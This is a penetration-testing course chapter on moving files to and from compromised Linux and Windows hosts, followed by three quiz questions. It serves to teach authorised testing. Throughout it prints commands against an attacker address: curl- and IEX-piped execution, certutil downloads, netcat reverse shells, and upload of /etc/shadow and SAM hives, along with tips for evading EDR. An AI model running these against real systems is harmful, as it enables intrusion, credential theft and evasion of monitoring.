5.1 File Transfer Techniques for Linux & Windows

Key Takeaways

  • Staging payloads and offensive utilities requires deploying dedicated, isolated attack-side listeners—such as Python http.server, PHP built-in servers, or SMB shares—configured in dedicated project directories to prevent accidental exposure of sensitive local files.

  • Modern Linux targets support diverse native download vectors including curl -o, wget -O, raw network socket redirection via Netcat listeners, and direct TCP stream writing through Bash pseudo-devices (/dev/tcp).

  • Windows environments offer multiple download mechanisms, ranging from PowerShell cmdlets (Invoke-WebRequest, System.Net.WebClient) and Windows built-in curl.exe to administrative utilities like certutil -urlcache -split -f and direct SMB UNC path execution (net use).

  • Post-compromise data exfiltration and credential staging can be accomplished using HTTP POST endpoints, Impacket SMB servers, interactive shell copy-paste operations, and unformatted Base64 encoding (base64 -w 0) to bypass restrictive terminal character filters.

Last updated: October 2026

5.1 File Transfer Techniques for Linux & Windows

File transfer operations represent a pivotal transition point during a practical penetration testing engagement. Gaining initial remote execution on a target machine—whether through an exposed web application vulnerability, a deserialization flaw, or a misconfigured service—often yields a constrained, non-interactive shell with minimal native tooling. To advance the assessment through privilege escalation, internal network pivoting, and lateral movement, the tester must reliably transfer custom compiled binaries, enumeration scripts (such as LinPEAS or WinPEAS), and post-exploitation frameworks onto the compromised host.

Conversely, achieving objective completion requires exfiltrating sensitive data, captured password hashes, configuration files, and proof-of-compromise flags back to the attack infrastructure. Because modern enterprise endpoints are monitored by host-based intrusion detection systems (HIDS), Endpoint Detection and Response (EDR) agents, and perimeter firewalls, penetration testers must master diverse, multi-protocol file transfer methods across both Linux and Windows environments.

Staging Payloads & Tooling Infrastructure

Before executing any download command on a compromised target, the tester must establish and organize an attack-side staging environment. Poor staging practices can result in failed transfers, unintended exposure of sensitive assessment notes, or immediate defensive alerting.

Dedicated Staging Directory Organization

Never stage payloads or launch network listeners directly from your attack machine's root directory (/), home folder (/root or /home/user), or assessment documentation folder. Doing so exposes private client notes, captured credentials, and bash history to anyone who discovers the open HTTP port or traverses the web root.

Always create a dedicated, isolated staging directory for the engagement:

mkdir -p /home/kali/engagement/staging
cd /home/kali/engagement/staging
cp /usr/share/peass/linpeas/linpeas.sh ./
cp /usr/share/windows-resources/binaries/nc.exe ./
chmod 644 *

Ensuring appropriate read permissions (chmod 644 or chmod +r) prevents HTTP 403 Forbidden errors when target hosts request files hosted by your web server.

Attack-Side HTTP Services

HTTP and HTTPS represent the most versatile outbound transfer protocols because enterprise egress firewall rules almost universally permit outbound traffic on ports 80 and 443.

Python 3 http.server

The standard method for deploying an ad-hoc web server on modern Kali Linux machines is the Python 3 http.server module:

# Launch HTTP listener on port 80 (requires root/sudo privileges for privileged ports)
sudo python3 -m http.server 80

# Launch HTTP listener on an unprivileged high port
python3 -m http.server 8080

By default, Python 3 binds to all available interfaces (0.0.0.0) and logs all incoming HTTP GET requests directly to the terminal, displaying the requesting client's IP address, timestamp, request path, and HTTP response status code (e.g., 200 OK or 404 Not Found).

Python 2 SimpleHTTPServer (Legacy Environments)

On older attack distributions or legacy pivot boxes running Python 2, the equivalent syntax uses SimpleHTTPServer:

# Python 2 syntax
python -m SimpleHTTPServer 80

PHP Built-In Web Server

If Python is unavailable or if you need an alternative staging daemon, PHP provides a lightweight built-in HTTP server:

# Launch PHP web server binding to all interfaces on port 8000
php -S 0.0.0.0:8000

Staging with SMB Servers (Impacket)

For Windows target environments, hosting files over the Server Message Block (SMB) protocol is frequently superior to HTTP. Windows natively communicates via SMB using Universal Naming Convention (UNC) paths (e.g., \\10.10.14.5\share\payload.exe), allowing binaries and scripts to be executed directly from the network without saving them to the local disk.

The Impacket framework provides smbserver.py, which instantiates an unauthenticated SMB share on the attack host:

# Start an SMB share named 'staging' pointing to the current directory
sudo impacket-smbserver staging /home/kali/engagement/staging -smb2support

The -smb2support flag is critical; modern Windows builds (Windows 10, Windows 11, and Windows Server 2016+) disable SMBv1 by default for security reasons. Omitting this flag will prevent modern Windows targets from connecting.


Linux File Retrieval Techniques

Linux operating systems provide several native command-line utilities and shell mechanisms that can download remote files onto the local filesystem.

1. curl (Client URL)

curl is a robust tool designed to transfer data to or from a network server using protocols including HTTP, HTTPS, FTP, and SCP.

# Download a file and save it under the same remote name
curl -O http://10.10.14.5/linpeas.sh

# Download a file and specify an explicit local output path
curl -o /tmp/linpeas.sh http://10.10.14.5/linpeas.sh

# Silent download suppressing progress meters
curl -s -o /tmp/linpeas.sh http://10.10.14.5/linpeas.sh
  • -o <file>: Writes the received data to the specified destination path.
  • -O: Preserves the remote file's basename when saving locally.
  • -s: Enables silent mode, which suppresses the transfer progress meter and error output (ideal when operating over unstable or noisy reverse shells).

Fileless In-Memory Execution with curl

To avoid writing binaries or scripts to the target's physical disk—bypassing basic file integrity monitoring—testers can pipe downloaded shell scripts directly into the interpreter:

curl -s http://10.10.14.5/linpeas.sh | bash

2. wget (World Wide Web Get)

wget is a non-interactive network downloader present by default on almost all standard Linux distributions.

# Download a file to the current working directory
wget http://10.10.14.5/linpeas.sh

# Download and save to an explicit destination path
wget -O /tmp/linpeas.sh http://10.10.14.5/linpeas.sh

# Quiet execution suppressing progress output
wget -q -O /tmp/linpeas.sh http://10.10.14.5/linpeas.sh
  • -O <file>: Directs output to a specific filename or path. Note the uppercase -O; lowercase -o logs output messages to a logfile instead of saving the downloaded file.
  • -q: Operates quietly, suppressing all terminal output.

Like curl, wget can execute scripts directly in memory by directing output to standard output (-O -):

wget -qO- http://10.10.14.5/linpeas.sh | bash

3. Netcat (nc) Raw Socket Data Transfer

When hardened Linux targets lack web utilities such as curl and wget, raw network sockets provide an effective fallback. Netcat can stream arbitrary files over arbitrary TCP or UDP ports.

Scenario A: Target Listens, Attacker Sends

If the target machine allows inbound connections on an open port:

# On the Target (Receiver):
nc -lvnp 4444 > /tmp/linpeas.sh

# On the Attack Host (Sender):
nc -nv 10.10.10.20 4444 < /home/kali/engagement/staging/linpeas.sh

Scenario B: Attacker Listens, Target Connects (Reverse Transfer)

If target egress firewalls block incoming connections, reverse the roles:

# On the Attack Host (Sender listening):
nc -lvnp 4444 < /home/kali/engagement/staging/linpeas.sh

# On the Target (Receiver connecting):
nc -nv 10.10.14.5 4444 > /tmp/linpeas.sh

The transfer completes silently; once the file stream reaches EOF (End of File), terminate the Netcat process with Ctrl+C.

4. Bash Pseudo-Device /dev/tcp File Transfer

In heavily locked-down environments where no third-party networking binaries (curl, wget, nc, python) are installed, Bash's built-in socket pseudo-device /dev/tcp can establish raw network connections.

# Establish TCP socket connection to attacker HTTP server on port 80 and assign file descriptor 3
exec 3<>/dev/tcp/10.10.14.5/80

# Send a raw HTTP GET request through file descriptor 3
echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: 10.10.14.5\r\nConnection: close\r\n\r\n" >&3

# Read the incoming response and save to disk
cat <&3 > /tmp/response.txt

# Inspect and clean the HTTP headers from the downloaded file
sed '1,/^\r$/d' /tmp/response.txt > /tmp/linpeas.sh

Because /dev/tcp is an internal feature of Bash (compiled with net-redirections enabled), it requires no external binaries or elevated permissions.


Windows File Retrieval Techniques

Windows operating systems feature diverse native administration tools, scripting environments, and built-in binaries that can be repurposed for offensive file transfer.

1. PowerShell Download Vectors

PowerShell is the standard automation and configuration framework on modern Windows operating systems. It provides multiple programmatic methods for retrieving files over HTTP/HTTPS.

Method A: Invoke-WebRequest

# Using Invoke-WebRequest
Invoke-WebRequest -Uri "http://10.10.14.5/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"

# Shortened alias syntax with basic parsing
iwr -Uri "http://10.10.14.5/nc.exe" -OutFile "C:\Windows\Temp\nc.exe" -UseBasicParsing

The -UseBasicParsing parameter is essential in restricted environments or when running PowerShell via an unprivileged non-interactive web shell. By default, Windows PowerShell 5.1 attempts to utilize the Internet Explorer DOM engine to parse web responses. If Internet Explorer has never been launched by the current user profile, Invoke-WebRequest will fail unless -UseBasicParsing is specified.

Method B: System.Net.WebClient

The .NET System.Net.WebClient class provides a dependable, legacy-compatible download vector:

# Download file directly to disk
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5/nc.exe', 'C:\Windows\Temp\nc.exe')

Method C: Fileless In-Memory Execution via DownloadString & IEX

To run offensive PowerShell scripts (such as PowerUp, PowerView, or SharpHound) without touching the hard drive:

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5/Invoke-PowerUp.ps1')

Invoke-Expression (IEX) evaluates the string returned by DownloadString directly within the active PowerShell process memory.

PowerShell Execution Policy Considerations

When executing downloaded .ps1 scripts, PowerShell may block execution with an ExecutionPolicy error. Circumvent this restriction from the command line:

powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\script.ps1
powershell.exe -EP Bypass -NoP -NonI -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5/script.ps1')"

The execution policy is not a security boundary; it is an administrative convenience designed to prevent unintentional script execution. Passing -ExecutionPolicy Bypass trivially bypasses it.

2. Windows Native curl.exe

Starting with Windows 10 (version 1803) and Windows Server 2019, Microsoft bundled an authentic, pre-compiled build of curl.exe located in C:\Windows\System32\curl.exe.

# Executing native curl inside cmd.exe
curl.exe -o C:\Windows\Temp\nc.exe http://10.10.14.5/nc.exe

The PowerShell Alias Collision Pitfall

A critical operational pitfall occurs when attempting to execute curl from within a Windows PowerShell terminal. In PowerShell 5.1, the string curl is aliased to Invoke-WebRequest:

PS C:\> Get-Alias curl
CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Alias           curl -> Invoke-WebRequest

If a tester enters curl -o payload.exe http://10.10.14.5/payload.exe, PowerShell executes Invoke-WebRequest, which misinterprets -o (expecting -OutFile) and returns a parameter error. To invoke the actual binary, you must explicitly specify curl.exe with the extension.

3. certutil.exe Download Vector

certutil.exe is a built-in Windows command-line utility used to manage Certification Authority (CA) certificates and cryptographic services. Attackers and penetration testers frequently leverage it as a Living off the Land Binary (LOLBIN) to download remote files.

certutil.exe -urlcache -split -f http://10.10.14.5/nc.exe C:\Windows\Temp\nc.exe
  • -urlcache: Displays or clears the URL cache entries.
  • -split: Forces splitting of fetched data chunks to retrieve the remote resource.
  • -f: Forces fetching the URL and overwrites any existing file with the same name.

Forensic Artifacts and OPSEC Risks

While convenient, certutil is an aggressive and conspicuous download mechanism:

  1. Cache Artifacts: certutil creates local cache entries inside %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content.
  2. Detection Signatures: Modern EDR agents and Windows Defender actively monitor for command lines containing certutil paired with -urlcache.
  3. Cache Cleanup: If used in an assessment, clear the generated cache entries:
    certutil.exe -urlcache -split -f http://10.10.14.5/nc.exe delete
    

4. SMB File Retrieval & UNC Paths

When the attack host runs an SMB server (such as impacket-smbserver), Windows target machines can access files directly using Universal Naming Convention (UNC) paths:

# Copy file from attacker SMB share to local disk
copy \\10.10.14.5\staging\nc.exe C:\Windows\Temp\nc.exe

# Execute a binary directly from the network share without saving to disk
\\10.10.14.5\staging\nc.exe -e cmd.exe 10.10.14.5 4444

# Explicitly mount the network share to an available drive letter
net use X: \\10.10.14.5\staging /user:guest ""
X:\nc.exe -e cmd.exe 10.10.14.5 4444
net use X: /delete

Direct UNC path execution is one of the most stealthy file execution techniques on Windows because the binary runs directly out of network memory buffers.


Data Exfiltration & Reverse File Transfers

Exfiltrating harvested artifacts—such as /etc/shadow, SAM hives, confidential databases, and proof flags—requires reliable transfer channels from the target back to the tester.

1. HTTP POST File Uploads

While default Python web servers only serve GET requests, testers can utilize third-party Python upload servers or lightweight scripts to receive uploaded files.

On the attack host, launch a Python server that supports POST uploads (e.g., uploadserver):

# On Kali: Install and run uploadserver
python3 -m pip install uploadserver
python3 -m uploadserver 80

On the target, transmit the loot via curl:

# On Linux Target: Upload /etc/shadow
curl -X POST http://10.10.14.5/upload -F "files=@/etc/shadow"

# On Windows Target (via PowerShell): Upload SAM hive
Invoke-RestMethod -Uri "http://10.10.14.5/upload" -Method Post -InFile "C:\Temp\sam.save" -ContentType "multipart/form-data"

2. SMB Reverse Exfiltration

Using Impacket's smbserver.py, exfiltration is as simple as copying files to the attacker's UNC path:

# On Windows Target:
copy C:\Users\Administrator\Desktop\flag.txt \\10.10.14.5\staging\flag.txt
copy C:\Temp\sam.save \\10.10.14.5\staging\sam.save

This requires zero additional software or script installation on the target.

3. Base64 Encoding & Decoding (Restricted Shell Transfers)

When operating over unstable reverse shells, serial consoles, or web command injection forms that truncate non-ASCII binary data or strip null bytes, Base64 encoding allows arbitrary files to be converted into clean, printable ASCII text strings.

Linux Base64 Exfiltration Workflow

# On Target: Encode file without line wrapping (-w 0)
base64 -w 0 /etc/shadow

# Copy the continuous string output from your terminal, then on Kali:
echo "a2VybmVsOiQ2JHFaOGpLbDltJFd..." | base64 -d > shadow_extracted.txt

The -w 0 switch is mandatory; by default, base64 inserts newline characters every 76 columns, which can break formatting when pasted into text files or web inputs.

Windows Base64 Ingestion Workflow

To write a small binary (such as nc.exe) to a Windows target without downloading it over a network socket:

# On Kali: Encode binary to a single-line base64 string
base64 -w 0 nc.exe > nc.b64

Copy the string content, then execute the decoding routine on the Windows host using PowerShell:

# On Windows: Decode Base64 string directly into binary executable
[IO.File]::WriteAllBytes("C:\Windows\Temp\nc.exe", [Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAA..."))

Alternatively, use Windows certutil built-in encoding:

# On Windows Target:
certutil -decode encoded.b64 C:\Windows\Temp\nc.exe

Comparative Reference Tables

Linux File Transfer Utilities & Techniques

Utility / MethodTypical Command SyntaxDependenciesIn-Memory Execution SupportKey Operational Considerations
curlcurl -s -o /tmp/tool http://<IP>/toolcurl package installedYes (curl ... | bash)Silent mode (-s) prevents terminal clutter during web shell interactions.
wgetwget -q -O /tmp/tool http://<IP>/toolwget package installedYes (wget -qO- ... | bash)Requires uppercase -O for file output; lowercase -o outputs log files.
Netcat (nc)nc -lvnp 4444 > /tmp/tool (receiver); nc -nv <IP> 4444 < tool (sender)nc or ncat binaryNo (writes to socket destination)Functions over raw TCP ports; works when HTTP egress is completely blocked.
Bash /dev/tcpexec 3<>/dev/tcp/<IP>/80; echo -e "GET /..." >&3; cat <&3 > outBuilt-in to GNU BashNo (writes raw stream to file)Requires no external binaries; must strip HTTP response headers manually.
Base64base64 -w 0 file (encode); echo "<str>" | base64 -d > filecoreutils packageNo (terminal buffer transfer)Safely transports binary files across restricted serial, web, or terminal shells.

Windows File Transfer Utilities & Evasion Considerations

Utility / MethodTypical Command SyntaxExecution ContextIn-Memory SupportEvasion & Forensic Considerations
PowerShell Invoke-WebRequestInvoke-WebRequest -Uri "http://<IP>/t" -OutFile "C:\Temp\t.exe" -UseBasicParsingPowerShell 3.0+No (writes to disk)-UseBasicParsing prevents failure on systems where Internet Explorer has never initialized.
PowerShell WebClient(New-Object Net.WebClient).DownloadFile('http://<IP>/t', 'C:\Temp\t.exe').NET Framework / PowerShellNo (writes to disk)Dependable across legacy and modern Windows versions; monitored by PowerShell Script Block Logging.
PowerShell DownloadString + IEXIEX (New-Object Net.WebClient).DownloadString('http://<IP>/s.ps1')In-memory executionYes (fileless)Leaves no disk artifacts; heavily inspected by AMSI (Antimalware Scan Interface).
Native curl.execurl.exe -o C:\Temp\t.exe http://<IP>/t.exeWindows 10 (1803+) / Server 2019+No (writes to disk)Must invoke with .exe in PowerShell to avoid collision with the Invoke-WebRequest alias.
certutil.execertutil.exe -urlcache -split -f http://<IP>/t.exe C:\Temp\t.exeBuilt-in Windows utilityNo (writes to disk)Leaves cryptographic URL cache artifacts on disk; universally flagged by modern EDR rules.
SMB UNC Pathcopy \\<IP>\staging\t.exe C:\Temp\t.exe; \\<IP>\staging\t.exeNative Windows SMB ClientYes (when executed directly over UNC)Requires SMB outbound (port 445); bypasses HTTP egress filtering and avoids saving to local disk.
PowerShell Base64[IO.File]::WriteAllBytes("t.exe", [Convert]::FromBase64String("..."))PowerShell .NET runtimeNo (writes to disk)Bypasses network inspection entirely; payload is delivered embedded in command text.
Test Your Knowledge

A penetration tester needs to transfer an enumeration script to a hardened Linux target where both curl and wget have been removed by an administrator. Which native command allows transferring the file over a raw TCP connection if Netcat (nc) is available on both systems?

A

Executing nc -lvnp 4444 > enum.sh on the target and nc -nv <target-ip> 4444 < enum.sh on the attack machine

B

Executing scp -P 4444 enum.sh target@<target-ip>:/tmp without entering user authentication credentials

C

Executing ftp -s:enum.sh <attacker-ip> to establish an unauthenticated TFTP broadcast stream

D

Executing curl --raw-tcp 4444 http://<attacker-ip>/enum.sh directly within the target shell

Test Your Knowledge

When downloading an exploit payload onto a modern Windows 10 host using command-line utilities, why might running curl http://<attacker-ip>/payload.exe -o payload.exe fail or behave unpredictably inside a default Windows PowerShell 5.1 session?

A

Windows PowerShell blocks all outbound network packets on TCP port 80 unless configured with an enterprise Kerberos ticket.

B

The curl command in Windows requires administrative elevation via User Account Control (UAC) to initiate any socket handshake.

C

The HTTP protocol is fundamentally unsupported by Windows operating systems without third-party drivers.

D

In Windows PowerShell 5.1, curl is a built-in alias for Invoke-WebRequest, which attempts to parse the HTML DOM unless curl.exe is explicitly invoked or -UseBasicParsing is specified.

Test Your Knowledge

During a penetration test, a tester establishes a restricted interactive shell on a target Linux machine that corrupts binary downloads and strips non-printable ASCII characters. How can the tester reliably exfiltrate a compressed archive named confidential_loot.tar.gz through the terminal session back to their local machine?

A

Renaming confidential_loot.tar.gz to confidential_loot.txt and viewing it with cat to preserve raw binary null bytes

B

Encoding the archive on the target using base64 -w 0 confidential_loot.tar.gz, copying the single-line ASCII output, and decoding it locally with base64 -d

C

Compressing the file with gzip -9 and piping the output directly to /dev/null on the target machine

D

Mounting the remote attacker's /etc/shadow file as a read-only NFS volume inside the restricted shell

Sections you finish are checked off in the contents.